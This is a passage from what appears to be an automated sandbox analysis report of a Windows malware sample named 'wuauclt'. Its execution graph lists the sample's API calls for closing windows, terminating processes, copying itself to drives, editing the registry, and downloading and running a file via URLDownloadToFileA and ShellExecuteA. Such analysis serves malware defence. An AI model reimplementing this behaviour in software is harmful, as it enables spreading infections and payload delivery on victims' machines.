                                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004), ref: 00401352
                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004), ref: 00401377
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004), ref: 0040139D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Alloc$Free
                                                                            • String ID: Hh
                                                                            • API String ID: 3668210933-2683877627
                                                                            • Opcode ID: ed0e3a9f715c948686bb42752dba42d67e7306a1d16e972f05cb686e700d65a0
                                                                            • Instruction ID: 1443cfa43066ccea577914be50a13efbb011f244d1dbdc7e12d8ece426878d7c
                                                                            • Opcode Fuzzy Hash: ed0e3a9f715c948686bb42752dba42d67e7306a1d16e972f05cb686e700d65a0
                                                                            • Instruction Fuzzy Hash: 29F0C8B17403206BE7315A694C86F433AD49F45754F144076BB08FF7DAD6B95800826C

                                                                            Execution Graph

                                                                            Execution Coverage:26.1%
                                                                            Dynamic/Decrypted Code Coverage:3.1%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:1557
                                                                            Total number of Limit Nodes:41
                                                                            execution_graph 5427 439cc7 5428 439ced 5427->5428 5429 439d06 VirtualAlloc 5428->5429 5431 439d2a 5429->5431 5434 439d46 5431->5434 5433 439d3e 5436 439d9b 5434->5436 5435 439e3f 5435->5433 5436->5435 5437 439e05 LoadLibraryA 5436->5437 5437->5436 6827 4084c8 6828 406f74 50 API calls 6827->6828 6829 4084cd 6828->6829 6840 40558c FindWindowA 6829->6840 6833 4084d7 6836 4084ef 6833->6836 6881 405fb0 6833->6881 6835 408511 6836->6835 6837 404d04 GetVersionExA 6836->6837 6838 408507 6837->6838 6838->6835 6931 406354 6838->6931 6841 4055a5 EnumChildWindows 6840->6841 6842 4055c8 6840->6842 6843 4055bb FindWindowExA 6841->6843 6845 406c30 6842->6845 6844 4055c4 6843->6844 6844->6841 6844->6842 6846 404f2c 18 API calls 6845->6846 6847 406c62 6846->6847 6848 403b5c 17 API calls 6847->6848 6849 406c6f 6848->6849 6850 404cf4 4 API calls 6849->6850 6851 406c77 6850->6851 6852 406ee7 6851->6852 6853 406c7f 6851->6853 6855 4039f4 17 API calls 6852->6855 6854 404f2c 18 API calls 6853->6854 6856 406c87 6854->6856 6857 406f01 6855->6857 6858 403b5c 17 API calls 6856->6858 6857->6833 6859 406c94 6858->6859 6860 4027bc 4 API calls 6859->6860 6861 406cab 6860->6861 6862 402560 4 API calls 6861->6862 6863 406cb0 6862->6863 6864 402dec 17 API calls 6863->6864 6865 406cc0 6864->6865 6866 402e58 4 API calls 6865->6866 6867 406cca 6866->6867 6868 402560 4 API calls 6867->6868 6869 406ccf 6868->6869 6870 402ba8 4 API calls 6869->6870 6871 406cd9 6870->6871 6872 402560 4 API calls 6871->6872 6873 406cde FindWindowA 6872->6873 6873->6852 6874 406d00 GetWindowTextA 6873->6874 6875 403b3c 17 API calls 6874->6875 6879 406d32 6875->6879 6876 406ebb FindWindowExA 6876->6852 6876->6874 6877 406db2 FindWindowExA FindWindowExA FindWindowExA FindWindowExA FindWindowExA 6877->6876 6877->6879 6878 403b3c 17 API calls 6878->6879 6879->6876 6879->6877 6879->6878 6880 406e6b SendMessageA Sleep SendMessageA SendMessageA 6879->6880 6880->6876 6885 405fb8 6881->6885 6882 40601a GetDriveTypeA 6882->6885 6883 406283 6886 4039f4 17 API calls 6883->6886 6884 403ba0 17 API calls 6884->6885 6885->6882 6885->6883 6885->6884 6887 404cf4 4 API calls 6885->6887 6893 406045 6885->6893 6888 40629d 6886->6888 6887->6885 6889 4039d0 17 API calls 6888->6889 6890 4062a5 6889->6890 6890->6836 6891 403ba0 17 API calls 6891->6893 6892 404cf4 4 API calls 6892->6893 6893->6891 6893->6892 6894 4060c3 SetFileAttributesA 6893->6894 6896 406061 6893->6896 6895 403ba0 17 API calls 6894->6895 6897 4060de 6895->6897 6898 403ba0 17 API calls 6896->6898 6900 4060e6 SetFileAttributesA 6897->6900 6899 406073 6898->6899 6902 40607b SetFileAttributesA 6899->6902 6901 403ba0 17 API calls 6900->6901 6903 4060fc 6901->6903 6904 403ba0 17 API calls 6902->6904 6906 406104 DeleteFileA 6903->6906 6905 406093 6904->6905 6908 40609b SetFileAttributesA 6905->6908 6907 403ba0 17 API calls 6906->6907 6909 40611a 6907->6909 6908->6883 6910 406122 DeleteFileA 6909->6910 6911 403e74 17 API calls 6910->6911 6912 406134 6911->6912 6913 406140 GetModuleFileNameA 6912->6913 6914 403e74 17 API calls 6913->6914 6916 406155 6914->6916 6915 403ba0 17 API calls 6915->6916 6916->6915 6917 406177 CopyFileA 6916->6917 6918 403ba0 17 API calls 6917->6918 6926 40618d 6918->6926 6919 4027c8 4 API calls 6919->6926 6920 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6920->6926 6921 4027d4 4 API calls 6921->6926 6922 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6922->6926 6923 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6923->6926 6924 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6924->6926 6925 403ba0 17 API calls 6925->6926 6926->6919 6926->6920 6926->6921 6926->6922 6926->6923 6926->6924 6926->6925 6927 406253 SetFileAttributesA 6926->6927 6928 403ba0 17 API calls 6927->6928 6929 40626b 6928->6929 6930 406273 SetFileAttributesA 6929->6930 6930->6885 6935 40635c 6931->6935 6932 4063be GetDriveTypeA 6932->6935 6933 403ba0 17 API calls 6933->6935 6934 406627 6936 4039f4 17 API calls 6934->6936 6935->6932 6935->6933 6935->6934 6937 404cf4 4 API calls 6935->6937 6944 4063e9 6935->6944 6938 406641 6936->6938 6937->6935 6939 4039d0 17 API calls 6938->6939 6941 406649 6939->6941 6940 403ba0 17 API calls 6940->6944 6941->6835 6942 404cf4 4 API calls 6942->6944 6943 406467 SetFileAttributesA 6945 403ba0 17 API calls 6943->6945 6944->6940 6944->6942 6944->6943 6946 406405 6944->6946 6948 406482 6945->6948 6947 403ba0 17 API calls 6946->6947 6949 406417 6947->6949 6950 40648a SetFileAttributesA 6948->6950 6952 40641f SetFileAttributesA 6949->6952 6951 403ba0 17 API calls 6950->6951 6953 4064a0 6951->6953 6954 403ba0 17 API calls 6952->6954 6956 4064a8 DeleteFileA 6953->6956 6955 406437 6954->6955 6958 40643f SetFileAttributesA 6955->6958 6957 403ba0 17 API calls 6956->6957 6959 4064be 6957->6959 6958->6934 6960 4064c6 DeleteFileA 6959->6960 6961 403e74 17 API calls 6960->6961 6962 4064d8 6961->6962 6963 4064e4 GetModuleFileNameA 6962->6963 6964 403e74 17 API calls 6963->6964 6966 4064f9 6964->6966 6965 403ba0 17 API calls 6965->6966 6966->6965 6967 40651b CopyFileA 6966->6967 6968 403ba0 17 API calls 6967->6968 6976 406531 6968->6976 6969 4027c8 4 API calls 6969->6976 6970 403ba0 17 API calls 6970->6976 6971 4027d4 4 API calls 6971->6976 6972 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6972->6976 6973 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6973->6976 6974 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6974->6976 6975 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6975->6976 6976->6969 6976->6970 6976->6971 6976->6972 6976->6973 6976->6974 6976->6975 6977 4065f7 SetFileAttributesA 6976->6977 6978 403ba0 17 API calls 6977->6978 6979 40660f 6978->6979 6980 406617 SetFileAttributesA 6979->6980 6980->6935 6985 43834b 6986 43835e VirtualFree 6985->6986 6989 438408 6986->6989 6993 438524 6989->6993 6990 438518 6991 4384f9 VirtualProtect 6991->6990 6991->6991 6995 43844c 6993->6995 6996 438532 6993->6996 6994 438550 LoadLibraryA 6994->6995 6994->6996 6995->6990 6995->6991 6996->6994 6996->6995 7224 43814a 7225 438159 7224->7225 7227 4381fa 7225->7227 7229 438214 7227->7229 7228 43851d 7228->7225 7229->7228 7230 438231 VirtualAlloc 7229->7230 7230->7228 7231 438273 7230->7231 7232 43827e 3 API calls 7231->7232 7232->7228 5438 408bd4 5439 408bdc 5438->5439 5439->5439 5495 4041b0 GetModuleHandleA 5439->5495 5442 408c45 5499 404f2c GetWindowsDirectoryA 5442->5499 5443 408c0f FindWindowA PostMessageA FindWindowA SendMessageA 5443->5442 5447 408c5f 5448 408c67 SetFileAttributesA 5447->5448 5518 403e74 5448->5518 5450 408c7c 5451 408c8d GetModuleFileNameA 5450->5451 5452 403e74 17 API calls 5451->5452 5453 408ca5 5452->5453 5454 404f2c 18 API calls 5453->5454 5455 408cad 5454->5455 5456 403b5c 17 API calls 5455->5456 5457 408cba 5456->5457 5458 408cc2 DeleteFileA 5457->5458 5459 404f2c 18 API calls 5458->5459 5460 408cd2 5459->5460 5461 403b5c 17 API calls 5460->5461 5462 408cdf 5461->5462 5463 408cf4 CopyFileA 5462->5463 5524 404a64 5463->5524 5466 404f2c 18 API calls 5467 408d15 5466->5467 5468 403b5c 17 API calls 5467->5468 5469 408d22 5468->5469 5470 404a64 18 API calls 5469->5470 5471 408d2d 5470->5471 5472 408d38 5471->5472 5473 408d79 5471->5473 5475 404d98 18 API calls 5472->5475 5530 404d98 5473->5530 5477 408d3d 5475->5477 5479 406928 26 API calls 5477->5479 5481 408d42 5479->5481 5483 404f2c 18 API calls 5481->5483 5485 408d50 5483->5485 5484 408d88 5620 408a20 LoadIconA LoadCursorA RegisterClassA 5484->5620 5487 403b5c 17 API calls 5485->5487 5489 408d5d 5487->5489 5488 408d8d 5640 4039f4 5488->5640 5491 408d65 ShellExecuteA 5489->5491 5629 407d8c 5491->5629 5494 408d77 5494->5488 5496 4041e3 5495->5496 5644 403788 5496->5644 5500 403b3c 17 API calls 5499->5500 5501 404f52 5500->5501 5502 404f6e 5501->5502 5503 403b5c 17 API calls 5501->5503 5504 403b5c 5502->5504 5503->5502 5505 403b60 5504->5505 5506 403b9f 5504->5506 5507 403a24 5505->5507 5508 403b6a 5505->5508 5506->5447 5514 403a94 17 API calls 5507->5514 5515 403a38 5507->5515 5509 403b94 5508->5509 5510 403b7d 5508->5510 5512 403e74 17 API calls 5509->5512 5513 403e74 17 API calls 5510->5513 5511 403a66 5511->5447 5517 403b82 5512->5517 5513->5517 5514->5515 5515->5511 5516 40248c 17 API calls 5515->5516 5516->5511 5517->5447 5519 403e81 5518->5519 5523 403eb1 5518->5523 5521 403e8d 5519->5521 5522 403a94 17 API calls 5519->5522 5520 4039d0 17 API calls 5520->5521 5521->5450 5522->5523 5523->5520 5525 404a72 5524->5525 6724 403ac0 5525->6724 5528 404a93 5528->5466 5529 404a8a CharUpperBuffA 5529->5528 5531 403e74 17 API calls 5530->5531 5532 404da7 5531->5532 5533 404db6 GetModuleFileNameA 5532->5533 5534 403e74 17 API calls 5533->5534 5535 404dce 5534->5535 5536 406928 5535->5536 5537 406930 5536->5537 6729 402f90 5537->6729 5540 402560 4 API calls 5541 40697c 5540->5541 6733 402c3c 5541->6733 5544 402560 4 API calls 5545 40698c 5544->5545 6741 402fac 5545->6741 5547 40699c 5548 402560 4 API calls 5547->5548 5549 4069a1 5548->5549 6748 402b88 5549->6748 5552 402560 4 API calls 5553 4069ba 5552->5553 5554 402c3c 6 API calls 5553->5554 5555 4069d8 5554->5555 5556 402560 4 API calls 5555->5556 5557 4069dd 5556->5557 5558 402fac 6 API calls 5557->5558 5559 4069ef 5558->5559 5560 402560 4 API calls 5559->5560 5561 4069f4 5560->5561 5562 402b88 6 API calls 5561->5562 5563 406a1b 5562->5563 5564 402560 4 API calls 5563->5564 5565 406a20 5564->5565 5566 403ac0 17 API calls 5565->5566 5567 406a36 5566->5567 6751 404d48 5567->6751 5572 404dd0 17 API calls 5573 406a6a 5572->5573 5574 403a24 17 API calls 5573->5574 5575 406a7a 5574->5575 5576 403da4 17 API calls 5575->5576 5577 406a95 5576->5577 5578 404dd0 17 API calls 5577->5578 5579 406aa6 5578->5579 5580 403a24 17 API calls 5579->5580 5581 406ab6 5580->5581 5582 403da4 17 API calls 5581->5582 5583 406ad3 5582->5583 5584 404dd0 17 API calls 5583->5584 5585 406ae4 5584->5585 5586 403a24 17 API calls 5585->5586 5587 406af4 5586->5587 5588 403da4 17 API calls 5587->5588 5589 406b11 5588->5589 5590 404dd0 17 API calls 5589->5590 5591 406b22 5590->5591 5592 403a24 17 API calls 5591->5592 5593 406b32 5592->5593 5594 403da4 17 API calls 5593->5594 5595 406b4f 5594->5595 5596 404dd0 17 API calls 5595->5596 5597 406b60 5596->5597 5598 403a24 17 API calls 5597->5598 5599 406b70 5598->5599 5600 403da4 17 API calls 5599->5600 5601 406b8d 5600->5601 5602 404dd0 17 API calls 5601->5602 5603 406b9e 5602->5603 5604 403a24 17 API calls 5603->5604 5605 406bae 5604->5605 5606 403da4 17 API calls 5605->5606 5607 406bcb 5606->5607 5608 404dd0 17 API calls 5607->5608 5609 406bdc 5608->5609 5610 403a24 17 API calls 5609->5610 5611 406bec 5610->5611 5612 402ba8 4 API calls 5611->5612 5613 406bf7 5612->5613 5614 402560 4 API calls 5613->5614 5615 406bfc 5614->5615 5616 4039f4 17 API calls 5615->5616 5617 406c19 5616->5617 5618 4039d0 17 API calls 5617->5618 5619 406c21 5618->5619 5634 4049cc GetVersionExA 5619->5634 5621 408b10 5620->5621 5622 408a88 5620->5622 5621->5488 6790 404414 CreateWindowExA 5622->6790 5624 408aae 5624->5621 5625 408abc SetTimer 5624->5625 5626 408aeb GetMessageA 5625->5626 5627 408afb KillTimer 5626->5627 5628 408adf TranslateMessage DispatchMessageA 5626->5628 5627->5621 5628->5626 5630 407d9d 5629->5630 5632 407da5 5630->5632 6791 4050dc GetEnvironmentVariableA 5630->6791 5632->5494 5635 404a32 5634->5635 5636 4049e9 5634->5636 5635->5484 5636->5635 5637 4049f0 LoadLibraryA 5636->5637 5637->5635 5638 404a08 GetProcAddress 5637->5638 5639 404a27 FreeLibrary 5638->5639 5639->5635 5641 4039fa 5640->5641 5642 403a20 5641->5642 5643 40248c 17 API calls 5641->5643 5643->5641 5645 4037bb 5644->5645 5648 403728 5645->5648 5649 403764 FindWindowA 5648->5649 5650 403737 5648->5650 5649->5442 5649->5443 5650->5649 5654 408550 5650->5654 5729 40854e 5650->5729 5804 408494 InternetGetConnectedState 5650->5804 5655 408558 5654->5655 5655->5655 5656 4087e5 5655->5656 5810 406f74 GetDesktopWindow 5655->5810 5659 4039f4 17 API calls 5656->5659 5661 4087ff 5659->5661 5661->5650 5664 40859b 5665 404dd0 17 API calls 5664->5665 5666 4085b1 5665->5666 5879 404c18 5666->5879 5671 404f2c 18 API calls 5672 4085db 5671->5672 5673 403b5c 17 API calls 5672->5673 5674 4085e8 5673->5674 5895 404af8 5674->5895 5677 404f2c 18 API calls 5678 40860f 5677->5678 5679 403b5c 17 API calls 5678->5679 5680 40861c 5679->5680 5681 408624 DeleteFileA 5680->5681 5904 4042ac CreateMutexA 5681->5904 5683 408638 5905 4042ac CreateMutexA 5683->5905 5685 408646 5906 4042ac CreateMutexA 5685->5906 5687 408654 5688 404f2c 18 API calls 5687->5688 5689 40865c 5688->5689 5690 404dd0 17 API calls 5689->5690 5691 40866d 5690->5691 5692 403b5c 17 API calls 5691->5692 5693 408676 5692->5693 5694 40867e DeleteFileA 5693->5694 5907 4042ac CreateMutexA 5694->5907 5696 408692 5697 404dd0 17 API calls 5696->5697 5698 40869f 5697->5698 5908 404854 5698->5908 5701 404dd0 17 API calls 5702 4086b4 5701->5702 5703 404854 39 API calls 5702->5703 5704 4086bc 5703->5704 5924 404b70 5704->5924 5707 404b70 20 API calls 5708 4086e4 5707->5708 5709 404b70 20 API calls 5708->5709 5710 4086f8 5709->5710 5711 404b70 20 API calls 5710->5711 5712 40870c 5711->5712 5713 404b70 20 API calls 5712->5713 5714 408720 5713->5714 5715 404dd0 17 API calls 5714->5715 5716 40872d 5715->5716 5717 404b70 20 API calls 5716->5717 5718 40873f 5717->5718 5719 404dd0 17 API calls 5718->5719 5720 40874c 5719->5720 5721 404b70 20 API calls 5720->5721 5722 40875e 5721->5722 5723 404d98 18 API calls 5722->5723 5724 408763 5723->5724 5725 406928 26 API calls 5724->5725 5726 408768 5725->5726 5727 408494 36 API calls 5726->5727 5728 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5727->5728 5728->5656 6031 407dd0 Sleep 5728->6031 6052 407f54 Sleep 5728->6052 6069 4084b8 Sleep 5728->6069 6072 407bec 5728->6072 6104 4072ac 5728->6104 5731 408550 5729->5731 5730 4087e5 5734 4039f4 17 API calls 5730->5734 5731->5730 5732 406f74 50 API calls 5731->5732 5733 408580 5732->5733 5735 4039d0 17 API calls 5733->5735 5736 4087ff 5734->5736 5737 40858a 5735->5737 5736->5650 5738 404dd0 17 API calls 5737->5738 5739 40859b 5738->5739 5740 404dd0 17 API calls 5739->5740 5741 4085b1 5740->5741 5742 404c18 21 API calls 5741->5742 5743 4085c6 5742->5743 5744 403a24 17 API calls 5743->5744 5745 4085d3 5744->5745 5746 404f2c 18 API calls 5745->5746 5747 4085db 5746->5747 5748 403b5c 17 API calls 5747->5748 5749 4085e8 5748->5749 5750 404af8 20 API calls 5749->5750 5751 408607 5750->5751 5752 404f2c 18 API calls 5751->5752 5753 40860f 5752->5753 5754 403b5c 17 API calls 5753->5754 5755 40861c 5754->5755 5756 408624 DeleteFileA 5755->5756 6644 4042ac CreateMutexA 5756->6644 5758 408638 6645 4042ac CreateMutexA 5758->6645 5760 408646 6646 4042ac CreateMutexA 5760->6646 5762 408654 5763 404f2c 18 API calls 5762->5763 5764 40865c 5763->5764 5765 404dd0 17 API calls 5764->5765 5766 40866d 5765->5766 5767 403b5c 17 API calls 5766->5767 5768 408676 5767->5768 5769 40867e DeleteFileA 5768->5769 6647 4042ac CreateMutexA 5769->6647 5771 408692 5772 404dd0 17 API calls 5771->5772 5773 40869f 5772->5773 5774 404854 39 API calls 5773->5774 5775 4086a7 5774->5775 5776 404dd0 17 API calls 5775->5776 5777 4086b4 5776->5777 5778 404854 39 API calls 5777->5778 5779 4086bc 5778->5779 5780 404b70 20 API calls 5779->5780 5781 4086d0 5780->5781 5782 404b70 20 API calls 5781->5782 5783 4086e4 5782->5783 5784 404b70 20 API calls 5783->5784 5785 4086f8 5784->5785 5786 404b70 20 API calls 5785->5786 5787 40870c 5786->5787 5788 404b70 20 API calls 5787->5788 5789 408720 5788->5789 5790 404dd0 17 API calls 5789->5790 5791 40872d 5790->5791 5792 404b70 20 API calls 5791->5792 5793 40873f 5792->5793 5794 404dd0 17 API calls 5793->5794 5795 40874c 5794->5795 5796 404b70 20 API calls 5795->5796 5797 40875e 5796->5797 5798 404d98 18 API calls 5797->5798 5799 408763 5798->5799 5800 406928 26 API calls 5799->5800 5801 408768 5800->5801 5802 408494 36 API calls 5801->5802 5803 40876d CreateThread CreateThread CreateThread CreateThread CreateThread 5802->5803 5803->5730 6648 407dd0 35 API calls 5803->6648 6649 407f54 58 API calls 5803->6649 6650 4084b8 37 API calls 5803->6650 6651 407bec 27 API calls 5803->6651 6652 4072ac 65 API calls 5803->6652 5805 4084b6 5804->5805 5806 4084ac 5804->5806 5805->5650 6653 4080c8 5806->6653 5811 406fab FindWindowExA GetWindowTextA 5810->5811 5932 403b3c 5811->5932 5813 406fe1 PostMessageA 5814 406fd0 5813->5814 5814->5811 5814->5813 5815 406ff1 GetDesktopWindow 5814->5815 5816 406ff8 FindWindowExA GetWindowTextA 5815->5816 5817 403b3c 17 API calls 5816->5817 5818 40701d 5817->5818 5818->5816 5819 40702e PostMessageA 5818->5819 5820 40703e GetDesktopWindow 5818->5820 5819->5818 5821 407045 FindWindowExA GetWindowTextA 5820->5821 5822 403b3c 17 API calls 5821->5822 5823 40706a 5822->5823 5823->5821 5824 40707b PostMessageA 5823->5824 5825 40708b GetDesktopWindow 5823->5825 5824->5823 5826 407092 FindWindowExA GetWindowTextA 5825->5826 5827 403b3c 17 API calls 5826->5827 5828 4070b7 5827->5828 5828->5826 5829 4070c8 PostMessageA 5828->5829 5830 4070d8 GetDesktopWindow 5828->5830 5829->5828 5831 4070df FindWindowExA GetWindowTextA 5830->5831 5832 403b3c 17 API calls 5831->5832 5833 407104 5832->5833 5833->5831 5834 407115 PostMessageA 5833->5834 5835 407125 GetDesktopWindow 5833->5835 5834->5833 5836 40712c FindWindowExA GetWindowTextA 5835->5836 5837 403b3c 17 API calls 5836->5837 5839 407151 5837->5839 5838 407162 PostMessageA 5838->5839 5839->5836 5839->5838 5840 407172 FindWindowA 5839->5840 5841 407182 FindWindowA PostMessageA 5840->5841 5842 40719a FindWindowA 5840->5842 5841->5842 5843 4071c2 FindWindowA 5842->5843 5844 4071aa FindWindowA PostMessageA 5842->5844 5845 4071f0 5843->5845 5846 4071d5 FindWindowA PostMessageA 5843->5846 5844->5843 5847 4039f4 17 API calls 5845->5847 5846->5845 5848 40720a 5847->5848 5849 4039d0 5848->5849 5850 4039f1 5849->5850 5851 4039d6 5849->5851 5853 404dd0 5850->5853 5851->5850 5964 40248c 5851->5964 5854 404dd8 5853->5854 5855 404e12 5854->5855 5856 404e05 5854->5856 5968 403a68 5855->5968 5857 4039d0 17 API calls 5856->5857 5859 404e0d 5857->5859 5864 4039f4 17 API calls 5859->5864 5861 403a68 17 API calls 5862 404e2c 5861->5862 5863 403a68 17 API calls 5862->5863 5865 404e39 5863->5865 5866 404ee5 5864->5866 5867 403a68 17 API calls 5865->5867 5868 4039d0 17 API calls 5866->5868 5869 404e46 5867->5869 5870 404eed 5868->5870 5972 403c14 5869->5972 5870->5664 5981 404bfc RegOpenKeyExA 5879->5981 5881 404c35 RegQueryValueExA 5882 404c77 5881->5882 5883 404c5d 5881->5883 5885 4039d0 17 API calls 5882->5885 5884 403b3c 17 API calls 5883->5884 5886 404c6f RegCloseKey 5884->5886 5887 404c7e RegCloseKey 5885->5887 5888 404c84 5886->5888 5887->5888 5889 403a24 5888->5889 5890 403a28 5889->5890 5893 403a38 5889->5893 5892 403a94 17 API calls 5890->5892 5890->5893 5891 403a66 5891->5671 5892->5893 5893->5891 5894 40248c 17 API calls 5893->5894 5894->5891 5982 404acc RegCreateKeyExA 5895->5982 5897 404b1e 5983 403b00 5897->5983 5899 404b2a 5900 404b32 RegSetValueExA RegCloseKey 5899->5900 5901 404b55 5900->5901 5902 4039d0 17 API calls 5901->5902 5903 404b5d 5902->5903 5903->5677 5904->5683 5905->5685 5906->5687 5907->5696 5909 404897 5908->5909 5989 4047bc 5909->5989 5911 4048b9 5994 4047dc 5911->5994 5913 403b3c 17 API calls 5923 4048ca 5913->5923 5914 404996 5915 4039f4 17 API calls 5914->5915 5917 4049b3 5915->5917 5918 4039d0 17 API calls 5917->5918 5919 4049bb 5918->5919 5919->5701 5920 40496e OpenProcess TerminateProcess 5920->5923 5922 404fdc 17 API calls 5922->5923 5923->5913 5923->5914 5923->5920 5923->5922 5999 405018 5923->5999 6009 4047fc 5923->6009 5925 404b87 5924->5925 5926 404ba9 RegOpenKeyA 5925->5926 6029 403d4c 5926->6029 5929 404be2 5930 4039f4 17 API calls 5929->5930 5931 404bef 5930->5931 5931->5707 5933 403ac0 5932->5933 5938 403a94 5933->5938 5935 403ad0 5936 4039d0 17 API calls 5935->5936 5937 403ae8 5936->5937 5937->5814 5939 403a98 5938->5939 5940 403abc 5938->5940 5943 40246c 5939->5943 5940->5935 5944 402471 5943->5944 5945 402484 5943->5945 5944->5945 5947 402554 5944->5947 5945->5935 5948 402508 5947->5948 5950 40252d 5948->5950 5953 404164 5948->5953 5961 4024fc 5950->5961 5954 404173 5953->5954 5955 404199 TlsGetValue 5953->5955 5954->5950 5956 4041a3 5955->5956 5957 40417e 5955->5957 5956->5950 5958 404120 LocalAlloc TlsSetValue 5957->5958 5959 404183 TlsGetValue 5958->5959 5960 404192 5959->5960 5960->5950 5962 4039b8 17 API calls 5961->5962 5963 402507 5962->5963 5963->5945 5965 402491 5964->5965 5967 4024a4 5964->5967 5966 402554 17 API calls 5965->5966 5965->5967 5966->5967 5967->5850 5970 403a6c 5968->5970 5969 403a90 5969->5861 5970->5969 5971 40248c 17 API calls 5970->5971 5971->5969 5973 403c25 5972->5973 5974 403c45 5973->5974 5975 403c59 5973->5975 5976 403e74 17 API calls 5974->5976 5977 403a94 17 API calls 5975->5977 5979 403c53 5976->5979 5977->5979 5978 403c8a 5979->5978 5980 403a24 17 API calls 5979->5980 5980->5978 5981->5881 5982->5897 5987 403ac0 5983->5987 5984 403a94 17 API calls 5985 403ad0 5984->5985 5986 4039d0 17 API calls 5985->5986 5988 403ae8 5986->5988 5987->5984 5988->5899 6014 404540 5989->6014 5992 4047d6 5992->5911 5993 4047cb CreateToolhelp32Snapshot 5993->5911 5995 404540 17 API calls 5994->5995 5996 4047e7 5995->5996 5997 4047f6 5996->5997 5998 4047eb Process32First 5996->5998 5997->5923 5998->5923 6000 40502a 5999->6000 6004 405067 6000->6004 6018 403de4 6000->6018 6002 405096 6003 403a24 17 API calls 6002->6003 6005 4050a0 6003->6005 6004->6002 6006 403de4 17 API calls 6004->6006 6007 4039d0 17 API calls 6005->6007 6006->6004 6008 4050b5 6007->6008 6008->5923 6010 404540 17 API calls 6009->6010 6011 404807 6010->6011 6012 404816 6011->6012 6013 40480b Process32Next 6011->6013 6012->5923 6013->5923 6015 404684 6014->6015 6016 40454f GetModuleHandleA 6014->6016 6015->5992 6015->5993 6016->6015 6017 404564 16 API calls 6016->6017 6017->6015 6023 403d9c 6018->6023 6020 403e28 6020->6000 6021 403df2 6021->6020 6022 403e74 17 API calls 6021->6022 6022->6020 6024 403d58 6023->6024 6025 403d93 6024->6025 6026 403a94 17 API calls 6024->6026 6025->6021 6027 403d6f 6026->6027 6027->6025 6028 40248c 17 API calls 6027->6028 6028->6025 6030 403d50 RegDeleteValueA RegCloseKey 6029->6030 6030->5929 6032 404f2c 18 API calls 6031->6032 6033 407df9 6032->6033 6034 403b5c 17 API calls 6033->6034 6035 407e06 6034->6035 6036 404af8 20 API calls 6035->6036 6037 407e25 6036->6037 6038 4039d0 17 API calls 6037->6038 6039 407e2f 6038->6039 6040 404dd0 17 API calls 6039->6040 6041 407e40 6040->6041 6042 404dd0 17 API calls 6041->6042 6043 407e56 6042->6043 6044 404c18 21 API calls 6043->6044 6045 407e6b 6044->6045 6046 403a24 17 API calls 6045->6046 6047 407e78 6046->6047 6049 407e87 6047->6049 6245 4068d0 InternetGetConnectedState 6047->6245 6050 4039f4 17 API calls 6049->6050 6051 407ea1 6050->6051 6053 404dd0 17 API calls 6052->6053 6054 407f89 6053->6054 6055 404dd0 17 API calls 6054->6055 6056 407f9f 6055->6056 6057 404af8 20 API calls 6056->6057 6058 407fb4 6057->6058 6059 404f2c 18 API calls 6058->6059 6060 407fbc 6059->6060 6061 403b5c 17 API calls 6060->6061 6062 407fc9 6061->6062 6063 404af8 20 API calls 6062->6063 6064 407fe8 6063->6064 6065 407ff7 6064->6065 6292 406708 InternetGetConnectedState 6064->6292 6067 4039f4 17 API calls 6065->6067 6068 408011 6067->6068 6070 408494 36 API calls 6069->6070 6071 4084c7 6070->6071 6073 407d0f 6072->6073 6076 407c12 6072->6076 6074 4039f4 17 API calls 6073->6074 6075 407d29 6074->6075 6076->6073 6077 404f2c 18 API calls 6076->6077 6078 407c31 6077->6078 6079 403b5c 17 API calls 6078->6079 6080 407c3e 6079->6080 6081 404cf4 4 API calls 6080->6081 6082 407c46 6081->6082 6082->6073 6083 404f2c 18 API calls 6082->6083 6084 407c5a 6083->6084 6085 403b5c 17 API calls 6084->6085 6086 407c67 6085->6086 6087 407c7c URLDownloadToFileA 6086->6087 6088 407c92 6087->6088 6089 407c88 Sleep 6087->6089 6090 404f2c 18 API calls 6088->6090 6089->6088 6091 407c9c 6090->6091 6092 403b5c 17 API calls 6091->6092 6093 407ca9 6092->6093 6094 404f2c 18 API calls 6093->6094 6095 407cba 6094->6095 6096 403b5c 17 API calls 6095->6096 6097 407cc7 6096->6097 6098 407ccf CopyFileA Sleep 6097->6098 6099 404f2c 18 API calls 6098->6099 6100 407ced 6099->6100 6101 403b5c 17 API calls 6100->6101 6102 407cfa 6101->6102 6103 407d02 ShellExecuteA 6102->6103 6103->6073 6105 4072b4 6104->6105 6105->6105 6106 4072bb 6105->6106 6107 404d04 GetVersionExA 6106->6107 6108 4072cf 6107->6108 6109 4072d8 6108->6109 6110 4076df Sleep 6108->6110 6111 404f2c 18 API calls 6109->6111 6112 404f2c 18 API calls 6110->6112 6113 4072e0 6111->6113 6114 4076f3 6112->6114 6115 403b5c 17 API calls 6113->6115 6116 403b5c 17 API calls 6114->6116 6117 4072ed 6115->6117 6118 407700 6116->6118 6120 4027c8 